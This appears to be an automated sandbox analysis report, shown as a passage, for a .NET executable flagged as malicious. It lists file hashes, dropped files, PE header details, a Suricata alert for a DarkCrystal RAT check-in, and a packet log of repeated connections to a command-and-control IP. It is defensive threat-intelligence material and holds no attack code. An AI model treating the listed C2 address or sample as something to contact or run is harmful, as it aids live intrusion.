                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\b773b89e2bfe58

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with very long lines (762), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):762
                                                        Entropy (8bit):5.890957328610645
                                                        Encrypted:false
                                                        SSDEEP:12:AoDXq0c54diZkkW6qTl811aLmuPkP96gYuBdy6CNiB/uqAzDVktoVL:AL0cSiZF9SjgYue6SiTAVktoR
                                                        MD5:1462E3E4C3B3F3314B49828CABE1A727
                                                        SHA1:578D3DA63E25336EA5013FA0EAC1E5EA082D1363
                                                        SHA-256:0EA5E399BD1C3559D50CC87FBC52B3799AA494A372C43ECF96C5B90FA08E6EAF
                                                        SHA-512:B342410C549DD3958F6E065C57007DBE8377D07B9A65627E2C552F4C69D5F45740DCE9B611E9ACABF0464553AB89614778F1EC9B3E06C21E9DC0DCAA8FF1D35F
                                                        Malicious:false
                                                        Preview:8upNThI76hqTQElWDtEzjFfwMFrvF4NtyGonYrHPGvDeTwOLJhoufyL2P3BNzX1CU6eJZ78WmysxBBca1gliPdOA4wYep3at3BJWREvLjRHrGY1NakWTvTw0sePnjeqsY93A1GIxuZ88Vh3g5KDFhG7jOTnxyHlFlZSHe0WUcjjWVyfLktsZalLRBTvidU8mx3W6OwBEytm7hlOaybMFYMoANBFKFx0Hl6ibbi7xrolr8NuZFUtCI2NlPWsNq19A2fWlDx8PdYYul6BAQqFuDy9ss7LF0uHzpkyd1JWRWeitddATVs6AvO6Efn2Gm3ZtRiFAHhJHUyYjQPPP62tHxGEaou7NQQpcEyb4Y9Lxjzq70WyPYnJtJR6LeoVXk50DI5ebyU16r6i8aGjR6rznG5Sx2QatoyNn8mz42WbDwMCMt7uYEDb2GN7Nmrjh4HS3t4AxRoZjPv142FE4fBokWUhvplSKw4Jo3Jdy77Hao1mUWCUhnoB2dsgYXOIpWOwVmMAtmP6i4O6fsMYmRuhH2QLLnEaszbDZERrJBl4Xrc8PvAqK0fXlqpcWBzFhzOtcLgbaePlq0KZZR6ZnXP2TDbsZyVIMfWhdtgDOiPql4rvgPCEFZcKjVZYtyClJGYKdm6qv2KEHjRZWpMKwQCwDM8HTHUagngefgS3SVTNOYC9EACEl1z2DlHRoyWoiuhdCw4zXT1a7zioK8DTFPzpyoa3ZAOe8ppe0i6RFMqRAY4ODcHpuDiS52pYWAa

                                                        \Device\Null

                                                        Download File
                                                        Process:C:\Windows\System32\PING.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):502
                                                        Entropy (8bit):4.630609828667227
                                                        Encrypted:false
                                                        SSDEEP:12:P9l5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:VfdUOAokItULVDv
                                                        MD5:01E42C7D0BFC330C8CB8F87BD1F25257
                                                        SHA1:EAD7E45750E84C22F8BB01AF7D3BF6CB81401F8F
                                                        SHA-256:A634384A405C46CD9DB3F596A3F5A032AC51B1B7634BC8FFB9D016CDBCF74CD4
                                                        SHA-512:61F024BC83B791B9A7396F4BF85F38E77E07ADFD7ECC07EE799E8A070533064FC5FB552DDFD41A3DF07E92D41D37585EA962FEF98DAB9CBD1CC4C84812CAC64A
                                                        Malicious:false
                                                        Preview:..Pinging 965543 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.4440967682851955
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:0JLWNg4Sz1.exe
                                                        File size:1'688'064 bytes
                                                        MD5:844679e76d8254bedd67c98610f7d7ac
                                                        SHA1:4222ebbb055830096b829f072783423dbe255932
                                                        SHA256:9b08f03985d3378123ba236fae1b41b42fcc9af87932655a5120e04fa9a21942
                                                        SHA512:fddb80736936d7c0d46ec3958885237681cbbd416455d7a48d075092d38a0c5e435112c25b595b8cc99b0a8ed2143ac2f28e893373a7b6e9772ee722706a3c05
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        TLSH:D5758D1655935E3BC2A15B318457403D82A5C7367962FF1B390F24E2B803BF5CBA72AB
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............@................................

                                                        File Icon

                                                        Icon Hash:90cececece8e8eb0

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x59d9ae
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6717909A [Tue Oct 22 11:46:34 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x19d9600x4b.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x19e0000x320.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a00000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x19b9b40x19ba007221b2082660ad89451a005499022f76False0.7484656136122078data7.448087998754818IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x19e0000x3200x400cc9c29dd08f1f9eac6e163c3743ab007False0.353515625data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .reloc0x1a00000xc0x2002f9bff5d95347eb46facd36be3e67b30False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x19e0580x2c8data0.46207865168539325

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-10-30T05:22:07.511045+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449730188.114.96.380TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 30, 2024 05:22:06.737387896 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:06.742839098 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:06.742921114 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:06.743472099 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:06.748766899 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:07.090254068 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:07.095707893 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:07.371233940 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:07.511044979 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:07.703283072 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:07.703303099 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:07.703380108 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:07.838994980 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:07.844830990 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:07.970782042 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:07.971436977 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:07.976836920 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.062536001 CET4973180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:08.068156004 CET8049731188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.068237066 CET4973180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:08.068360090 CET4973180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:08.073745966 CET8049731188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.295356989 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.327297926 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:08.332710981 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.417546988 CET4973180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:08.423069000 CET8049731188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.457668066 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.457895041 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:08.463238955 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.463423014 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.654841900 CET8049731188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.775423050 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:08.807948112 CET4973180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:08.823568106 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:08.970016956 CET8049731188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:09.093787909 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:09.094923973 CET4973280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:09.097393036 CET4973180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:09.099922895 CET8049730188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:09.099987030 CET4973080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:09.100296974 CET8049732188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:09.100421906 CET4973280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:09.100539923 CET4973280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:09.103069067 CET8049731188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:09.103127956 CET4973180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:09.105799913 CET8049732188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:09.448961973 CET4973280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:09.454531908 CET8049732188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:09.694474936 CET8049732188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:09.745423079 CET4973280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:10.022835016 CET8049732188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:10.076219082 CET4973280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:10.160218954 CET4973380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:10.165817022 CET8049733188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:10.166030884 CET4973380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:10.166030884 CET4973380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:10.171370029 CET8049733188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:10.511221886 CET4973380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:10.516653061 CET8049733188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:10.752176046 CET8049733188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:10.807970047 CET4973380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:11.071619987 CET8049733188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:11.122450113 CET4973380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:11.283886909 CET4973380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:11.284940958 CET4973480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:11.289601088 CET8049733188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:11.289664030 CET4973380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:11.290230036 CET8049734188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:11.290298939 CET4973480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:11.290406942 CET4973480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:11.295718908 CET8049734188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:11.636276007 CET4973480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:11.641726971 CET8049734188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:11.884320021 CET8049734188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:11.940769911 CET4973480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:12.219506979 CET8049734188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:12.261068106 CET4973480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:12.335131884 CET4973480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:12.335913897 CET4973580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:12.355122089 CET8049735188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:12.355200052 CET4973580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:12.355329990 CET4973580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:12.357997894 CET8049734188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:12.358056068 CET4973480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:12.360841036 CET8049735188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:12.714437962 CET4973580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:12.719990015 CET8049735188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:12.952776909 CET8049735188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:12.995510101 CET4973580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.261493921 CET8049735188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.307950020 CET4973580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.380250931 CET4973580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.380990028 CET4973680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.385899067 CET8049735188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.385986090 CET4973580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.386322021 CET8049736188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.386401892 CET4973680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.386506081 CET4973680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.391801119 CET8049736188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.745790005 CET4973680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.751254082 CET8049736188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.794352055 CET4973780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.800120115 CET8049737188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.800199986 CET4973780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.800328970 CET4973780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.801826000 CET4973680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.805630922 CET8049737188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.850548029 CET8049736188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.862638950 CET8049736188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.862715006 CET4973680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.969089985 CET4973880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.974749088 CET8049738188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:13.974817991 CET4973880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.974978924 CET4973880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.980045080 CET4973280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:13.980222940 CET8049738188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:14.151985884 CET4973780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:14.157751083 CET8049737188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:14.157768965 CET8049737188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:14.323700905 CET4973880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:14.329129934 CET8049738188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:14.394207001 CET8049737188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:14.448565006 CET4973780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:14.581960917 CET8049738188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:14.626198053 CET4973880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:14.702514887 CET8049737188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:14.747651100 CET4973780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:14.911711931 CET8049738188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:14.980247974 CET4973880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.042821884 CET4973780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.042830944 CET4973880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.043880939 CET4974080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.048481941 CET8049737188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:15.048784971 CET8049738188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:15.048866034 CET4973880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.049201012 CET8049740188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:15.049412012 CET4974080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.049412012 CET4974080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.050556898 CET4973780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.054692984 CET8049740188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:15.401842117 CET4974080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.407429934 CET8049740188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:15.674638987 CET8049740188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:15.714231968 CET4974080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:15.997582912 CET8049740188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:16.042346954 CET4974080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:16.118773937 CET4974080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:16.120011091 CET4974280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:16.124747038 CET8049740188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:16.124829054 CET4974080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:16.125406027 CET8049742188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:16.125493050 CET4974280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:16.125663042 CET4974280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:16.131017923 CET8049742188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:16.479959011 CET4974280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:16.486236095 CET8049742188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:16.728323936 CET8049742188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:16.776694059 CET4974280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:17.038127899 CET8049742188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:17.089195013 CET4974280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:17.166825056 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:17.172322035 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:17.172388077 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:17.172498941 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:17.177727938 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:17.527048111 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:17.532931089 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:17.769099951 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:17.823574066 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.063199043 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.104932070 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.345877886 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.346647978 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.351588011 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.352273941 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.352278948 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.352349997 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.352463961 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.357994080 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.698719025 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.705203056 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.950525045 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.995469093 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.277766943 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.323626995 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.405169010 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.405569077 CET4974880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.410875082 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.411062002 CET8049748188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.411138058 CET4974880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.411190033 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.411257982 CET4974880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.417296886 CET8049748188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.715763092 CET4974880192.168.2.4188.114.96.3
